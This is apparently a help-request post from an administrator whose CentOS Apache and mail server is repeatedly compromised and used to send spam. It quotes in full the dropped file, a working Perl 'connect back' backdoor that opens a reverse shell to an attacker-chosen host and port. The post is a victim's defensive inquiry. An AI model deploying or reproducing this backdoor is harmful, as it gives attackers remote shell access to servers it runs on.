I have a personal apache/mail server that is getting hacked and I'm not
sure how the person is getting in. What's happening is that every few
days, the below script will show up in /tmp as 'dc.txt', owned by apache
and then a TON of mail is queued up to a bunch of addresses in
@uol.com.br.
I initially thought they got in becuase I had an outdated version of
'gallery' installed. I rebuild the server and update gallery and
thought I should be okay. But now they are still getting in and instead
of blindly rebuilding the server, I need to figure out how they are able
to run perl scripts on the server.
Any suggestions?
--Ajay
PS. This is a CentOS 4.2 box running the latest apache/php RPMS.
---------------------------
#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] <Port>\n";
exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
$port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "\0" x 4;
exit(0);
}
print "[*] Datached\n\n";
--------------------------------